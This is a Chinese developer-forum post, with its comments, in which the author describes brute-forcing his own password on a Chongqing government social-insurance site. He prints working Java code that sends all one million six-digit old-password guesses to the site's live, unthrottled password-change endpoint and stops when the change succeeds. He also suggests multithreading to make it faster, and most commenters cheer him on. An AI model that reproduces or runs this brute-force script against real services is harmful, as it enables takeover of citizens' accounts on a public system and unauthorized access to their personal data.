一次跟社保局的碰撞试验

本贴最后更新于 2409 天前,其中的信息可能已经天翻地覆

  昨天早晨,我妈叫我把回来重庆后参加工作的社保缴纳的截图发给她,她给村里的一个类似于会计工作的人,用于统计整个村的社保缴纳情况,我一想,这个简单呐,以前在惠州的时候也给过一次,登录网站 + 截图,简单快捷。

  可是当我登录上重庆的社保查询界面的时候,才发现事情并没有那么简单,第一,我好想没有社保卡,第二, 我并不知道社保查询密码。于是我发微信问了下我们 HR 社保情况,谁知道我们美丽大方温柔漂亮的 HR 居然叫我直接联系第三方参保方,也就是重庆中智。一个电话打过,没人接,二个电话打过去没人接,三个电话打过去还是没人接。我大概周末这群人可能是不上班的,可是俺妈催得紧咋办呢。

  所以我索性打电话给重庆社保局,看看能不能重置我的登录密码。一个电话打过,没人接,二个电话打过去没人接,三个电话打过去还是没人接。这个就有点绝望了,各位大佬们都是要休周末的,我有点绝望。

  当我百无聊赖的点着登录界面,胡乱试试我平时喜欢用的密码的时候,我在想,为什么不来一场激烈的碰撞。你看看 6 位数的数字密码。排列组合也就 1000000 种可能而已,学这个行业,不能白瞎了呀,区区官方网站,又岂能奈我何,所以我打算去 gayhub 上搜一搜验证码的破解,就这破验证码做得,不是随随便便就可以搞定的吗。

  还没准备搜,看到图中有个修改密码的选项,于是就点了,结果。。。。是个伪按钮,根本点不动,什么都没有发生,我一想这不可能啊,好歹是官方的网站,怎么可能放个如此难看的按钮在这里摆着,要做样子也要摆个好看的不是,这么难看的按钮,肯定是有用的。于是结合我在 TCL 的经历,我觉得这个按钮应该只有在 ie8 以及以下的浏览器才能生效,but 我总不能去下载一个 ie8 吧。

  我觉得试试我的前端水准,F12 按下去,

<a onclick="changePwd();;;" style="margin-left: 10px; text-decoration: underline;">修改个人查询密码</a>

  我也不知道这个三个分号是个什么意思,所以我顺便找到了 changePwd()的函数

function changePwd() {
		var url = "/ggfw/pages/wxcx/grmmgl.jsp";
		window.showModalDialog(url, this,
			"center:1;dialogWidth:700px;dialogHeight:500px;");
}

  所以搞了半天,这个只是彪出个弹窗而已,将链接地址复制到浏览器

 

  如此清新的界面,不禁让我感到一丝尊敬,没有了验证码的干扰,真是让我无比兴奋,输入了正确的原文,然后点击提交,F12,我就看到了我想看到的东西,也就是 http 的 header


  可以看到这个平凡到不能在平凡的请求,几乎没有任何添加剂,简直是完美。

  开始我的编程之旅,就用这个修改密码的链接,还省去了我去下载和验证破解验证码的代码的过程,这个样简单的碰撞密码的代码,我一个小时能写一打儿

public static String Post(String strURL, String params) {  
        try {  
            URL url = new URL(strURL);// 创建连接  
            HttpURLConnection connection = (HttpURLConnection) url.openConnection();
            connection.setDoOutput(true);  
            connection.setDoInput(true);  
            connection.setUseCaches(false);  
            connection.setInstanceFollowRedirects(true);  
            connection.setRequestMethod("POST"); // 设置请求方式  
            connection.setReadTimeout(100);
            connection.connect();  
            OutputStreamWriter out = new OutputStreamWriter(connection.getOutputStream(), "UTF-8"); // utf-8编码  
            out.append(params);  
            out.flush();  
            out.close();  
            
            InputStream is = connection.getInputStream(); 

            byte\[\] temp = new byte\[connection.getContentLength()\];  
            is.read(temp);
            String result = new String(temp, "UTF-8"); // utf-8编码  
            return result;  
  
        } catch (IOException e) {  
        	return "IOException";
        }
    } 

 以下是解析成字符串

public static String getPwdString(int index) {
    	int length = String.valueOf(index).length();
    	switch (length) {
			case 1:
				return "00000"+index;
			case 2:
				return "0000"+index;
			case 3:
				return "000"+index;
			case 4:
				return "00"+index;
			case 5:
				return "0"+index;
			case 6:
				return ""+index;
			default:
				return "";
		}
    }
``` 

以下是主函数

public static void main(String[] args) throws InterruptedException {
String url = "http://ggfw.cqhrss.gov.cn/ggfw/ChangeBLH_changeGrpwd.do";
String urlpara = "bh=50010********45***5&xm=文昌平&ymm=pwd&xmm=123456&rmm=123456";

	for(int i=0;i<1000000;i++) {
		String pwdd = getPwdString(i);
		if(pwdd.equals("")) {
			System.out.println("获取密码出错");
			System.exit(0);
		}
		String result = Post(url,urlpara.replace("pwd", pwdd));
		while("IOException".equals(result)) {
			result = Post(url,urlpara.replace("pwd", pwdd));
		}
		System.out.println(i);
		Bean bean = JSONUtil.json2Object(result, Bean.class);
		if(bean.getCode()!=0) {
			System.out.println("设置成功");
			System.exit(0);
		}
	}
}

于是在一段时间后,程序退出了,设置密码成功,我用我的新密码登录,果然就通过了。觉得很有意思,在此分享。  

  后记,这个代码有很大的提升空间,你要知道,请求一百万次http请求还是很费时间的,如果能搞成多线程的话,将会非常完美,也许10分钟就能出结果,由于我目的已经达到了,所以也就没有去接着研究,而且写多线程的时间,也许我答案已经找到了,毕竟如果密码是1开头或者0开头的话,就会很快。

  以上,分享给各位
  • 安全

    安全永远都不是一个小问题。

    200 引用 • 816 回帖 • 1 关注
  • 社保
    3 引用 • 78 回帖
  • 程序员

    程序员是从事程序开发、程序维护的专业人员。

    574 引用 • 3533 回帖 • 1 关注

相关帖子

欢迎来到这里!

我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。

注册 关于
请输入回帖内容 ...
  • Eddie

    这种文章,社区不能发的吧。

    1 回复
  • xjtushilei

    楼主很 6 呀.

    另,多线程多写点,以后都是随手写的

    1 回复
  • jy02201949

    要是我就拿一些常见的密码怼上去,默认密码一般都比较弱智的吧

    1 回复
  • wenandlu
    作者

    这有什么不能发的,靠本事碰撞的密码,凭什么不能发

  • wenandlu
    作者

    多线程一开始没想那么多,而且我有强迫症,一旦考虑到同步或者共享数据的情况,我就很谨慎,反而耽误我找答案,毕竟,我的目的很单纯,我只想改个密码而已

  • wenandlu
    作者

    默认密码是社保卡后六位数,后来实验证明,后六位完全是随机的

    1 回复
  • fu123

    源码来一打

  • fu123

    源码来能看看吗,楼主?

    1 回复
  • wenandlu
    作者

    全部源码都在博客里呀,就这么点东西

  • cangxian

    握草,都是写 Java 的,为何你这么优秀

  • ibut

    66666666

  • yangyujiao

    这种你没有改过的肯定有初始密码呀。。。百度一下就可以的吧。之前我公积金的就是一直用初始密码,忘记了,就百度北京公积金初始密码。。。

    不过,小哥哥很厉害呀,脑子够灵活啊。

    1 回复
  • wyjackie

    这种内容还是不要发的好,避免不必要的麻烦

    1 回复
  • auvCool

    burp suit 了解一下

  • alanfans

    政府网站呢,你能这么玩?你不怕收快递?

    2 回复
  • ab

    故事比代码好看系列

  • ab

    第一张图暴露身份证号系列

  • wenandlu
    作者

    初始密码是社保卡号码后六位,可是我根本没有社保卡

    1 回复
  • wenandlu
    作者

    我帮他们找 bug,至少得谢谢我,怎么会有麻烦呢

  • wenandlu
    作者

    简单得说,我不怕,哈哈

  • wenandlu
    作者

    说不定政府把我招安,去做政府网站的安全管理,我也挺乐意的

    1 回复
  • jama

    怕是去做个锤子哦

  • yangyujiao

    你是因为刚缴纳,社保卡还没下来吗?
    不然怎么会缴纳了社保,没有卡呢。

    另外社保卡号码就是身份证号码啊。

    1 回复
  • Zachary

    前段时间和楼主一样,然而深圳社保登录失败超出一定次数就不让登录了,老老实实手机重置

    1 回复
  • zorro3556

    企事业单位的网站安防还停留在十年前,楼主威武

    2 回复
  • wenandlu
    作者

    社保去年就开始交了,但是社保卡一直没有,去查又是交了的,也不知道为啥,而且社保卡号码不是身份证号码,因为身份证后六位我试过了,不正确

    1 回复
  • wenandlu
    作者

    重庆社保登录失败一定次数也会不让登录,但是让我找到了 bug,就是修改密码没有限制

  • wenandlu
    作者

    哈哈,为啥我感觉不是因为他们 low,而是我太牛逼呢😂

    1 回复
  • yangyujiao

    北京的社保卡上面的账号就是身份证的号码。
    是不是你查的初始密码不对,不是身份证后 6 位呢。

    比如我记得公积金的是身份证后 4 位 +00.

    你缴纳了社保,社保卡不应该这么就没拿到,登录可以看到社保卡的进度,是哪个步骤都写了。

    1 回复
  • wenandlu
    作者

    可是,就是没有😭 ,我也不想去追究了,需要用到再去社保去补办吧

    1 回复
  • yangyujiao

    这玩意是公司去领回来,发给你的。你去医院挂号就要用的呀···

    1 回复
  • wenandlu
    作者

    说出来你可能不信,我这辈子没因为我自己的事情去过医院,大多都是去药店那点感冒药.......

    1 回复
  • yangyujiao

    我信呀 因为正常人都不太去医院啊,我感冒发烧啥的也从来不去医院啊。。。

  • UUUS

    是你太吊

  • fayray

    厉害,厉害、当年去家公司,前 HR 走得急,没有把社保公司的账户密码交接,
    木有办法,只能老实去柜面办理,密码重更业务

  • kkk

    小结下,大概就是用程序写几位数的随机原密码,直到正确,然后修改密码成功。所以,楼主公布源码的吗trollface

    1 回复
  • qiangzi163

    佩服佩服,自行搞定

  • loocao

    不知道是哪个学校的学生写的~

  • wenandlu
    作者

    源码就在博客中,就那么 2 段,写的略为丑陋

  • 你为什么不给身份证号打个码啊?

    1 回复
  • wenandlu
    作者

  • Peiel

    楼主 666,不过这个网站做的真不够安全的

  • chocotan

    上海、苏州都是没社保卡的,只有医保卡

    1 回复
  • wenandlu
    作者

    😂 你关注的点好奇怪哈

  • wenandlu
    作者

    这破帖子居然浏览量可以上千,白瞎了那些年我在 iteye 上写的那些博客了

  • nywlxql

    这个网站做的真不够安全😳

请输入回帖内容 ...

推荐标签 标签

  • 博客

    记录并分享人生的经历。

    273 引用 • 2388 回帖
  • Elasticsearch

    Elasticsearch 是一个基于 Lucene 的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于 RESTful 接口。Elasticsearch 是用 Java 开发的,并作为 Apache 许可条款下的开放源码发布,是当前流行的企业级搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。

    117 引用 • 99 回帖 • 210 关注
  • Swagger

    Swagger 是一款非常流行的 API 开发工具,它遵循 OpenAPI Specification(这是一种通用的、和编程语言无关的 API 描述规范)。Swagger 贯穿整个 API 生命周期,如 API 的设计、编写文档、测试和部署。

    26 引用 • 35 回帖 • 5 关注
  • 30Seconds

    📙 前端知识精选集,包含 HTML、CSS、JavaScript、React、Node、安全等方面,每天仅需 30 秒。

    • 精选常见面试题,帮助您准备下一次面试
    • 精选常见交互,帮助您拥有简洁酷炫的站点
    • 精选有用的 React 片段,帮助你获取最佳实践
    • 精选常见代码集,帮助您提高打码效率
    • 整理前端界的最新资讯,邀您一同探索新世界
    488 引用 • 384 回帖
  • etcd

    etcd 是一个分布式、高可用的 key-value 数据存储,专门用于在分布式系统中保存关键数据。

    5 引用 • 26 回帖 • 528 关注
  • Hprose

    Hprose 是一款先进的轻量级、跨语言、跨平台、无侵入式、高性能动态远程对象调用引擎库。它不仅简单易用,而且功能强大。你无需专门学习,只需看上几眼,就能用它轻松构建分布式应用系统。

    9 引用 • 17 回帖 • 612 关注
  • OpenResty

    OpenResty 是一个基于 NGINX 与 Lua 的高性能 Web 平台,其内部集成了大量精良的 Lua 库、第三方模块以及大多数的依赖项。用于方便地搭建能够处理超高并发、扩展性极高的动态 Web 应用、Web 服务和动态网关。

    17 引用 • 39 关注
  • Lute

    Lute 是一款结构化的 Markdown 引擎,支持 Go 和 JavaScript。

    26 引用 • 196 回帖 • 17 关注
  • 持续集成

    持续集成(Continuous Integration)是一种软件开发实践,即团队开发成员经常集成他们的工作,通过每个成员每天至少集成一次,也就意味着每天可能会发生多次集成。每次集成都通过自动化的构建(包括编译,发布,自动化测试)来验证,从而尽早地发现集成错误。

    15 引用 • 7 回帖
  • LaTeX

    LaTeX(音译“拉泰赫”)是一种基于 ΤΕΧ 的排版系统,由美国计算机学家莱斯利·兰伯特(Leslie Lamport)在 20 世纪 80 年代初期开发,利用这种格式,即使使用者没有排版和程序设计的知识也可以充分发挥由 TeX 所提供的强大功能,能在几天,甚至几小时内生成很多具有书籍质量的印刷品。对于生成复杂表格和数学公式,这一点表现得尤为突出。因此它非常适用于生成高印刷质量的科技和数学类文档。

    12 引用 • 54 回帖 • 49 关注
  • Hibernate

    Hibernate 是一个开放源代码的对象关系映射框架,它对 JDBC 进行了非常轻量级的对象封装,使得 Java 程序员可以随心所欲的使用对象编程思维来操纵数据库。

    39 引用 • 103 回帖 • 715 关注
  • ReactiveX

    ReactiveX 是一个专注于异步编程与控制可观察数据(或者事件)流的 API。它组合了观察者模式,迭代器模式和函数式编程的优秀思想。

    1 引用 • 2 回帖 • 160 关注
  • 又拍云

    又拍云是国内领先的 CDN 服务提供商,国家工信部认证通过的“可信云”,乌云众测平台认证的“安全云”,为移动时代的创业者提供新一代的 CDN 加速服务。

    21 引用 • 37 回帖 • 549 关注
  • 安装

    你若安好,便是晴天。

    132 引用 • 1184 回帖 • 1 关注
  • Ngui

    Ngui 是一个 GUI 的排版显示引擎和跨平台的 GUI 应用程序开发框架,基于
    Node.js / OpenGL。目标是在此基础上开发 GUI 应用程序可拥有开发 WEB 应用般简单与速度同时兼顾 Native 应用程序的性能与体验。

    7 引用 • 9 回帖 • 394 关注
  • DNSPod

    DNSPod 建立于 2006 年 3 月份,是一款免费智能 DNS 产品。 DNSPod 可以为同时有电信、网通、教育网服务器的网站提供智能的解析,让电信用户访问电信的服务器,网通的用户访问网通的服务器,教育网的用户访问教育网的服务器,达到互联互通的效果。

    6 引用 • 26 回帖 • 518 关注
  • Angular

    AngularAngularJS 的新版本。

    26 引用 • 66 回帖 • 535 关注
  • 支付宝

    支付宝是全球领先的独立第三方支付平台,致力于为广大用户提供安全快速的电子支付/网上支付/安全支付/手机支付体验,及转账收款/水电煤缴费/信用卡还款/AA 收款等生活服务应用。

    29 引用 • 347 回帖 • 4 关注
  • WebComponents

    Web Components 是 W3C 定义的标准,它给了前端开发者扩展浏览器标签的能力,可以方便地定制可复用组件,更好的进行模块化开发,解放了前端开发者的生产力。

    1 引用 • 3 关注
  • 小说

    小说是以刻画人物形象为中心,通过完整的故事情节和环境描写来反映社会生活的文学体裁。

    28 引用 • 108 回帖
  • 深度学习

    深度学习(Deep Learning)是机器学习的分支,是一种试图使用包含复杂结构或由多重非线性变换构成的多个处理层对数据进行高层抽象的算法。

    53 引用 • 40 回帖
  • IDEA

    IDEA 全称 IntelliJ IDEA,是一款 Java 语言开发的集成环境,在业界被公认为最好的 Java 开发工具之一。IDEA 是 JetBrains 公司的产品,这家公司总部位于捷克共和国的首都布拉格,开发人员以严谨著称的东欧程序员为主。

    181 引用 • 400 回帖
  • sts
    2 引用 • 2 回帖 • 197 关注
  • SOHO

    为成为自由职业者在家办公而努力吧!

    7 引用 • 55 回帖 • 5 关注
  • OnlyOffice
    4 引用 • 3 关注
  • Love2D

    Love2D 是一个开源的, 跨平台的 2D 游戏引擎。使用纯 Lua 脚本来进行游戏开发。目前支持的平台有 Windows, Mac OS X, Linux, Android 和 iOS。

    14 引用 • 53 回帖 • 538 关注
  • 外包

    有空闲时间是接外包好呢还是学习好呢?

    26 引用 • 232 回帖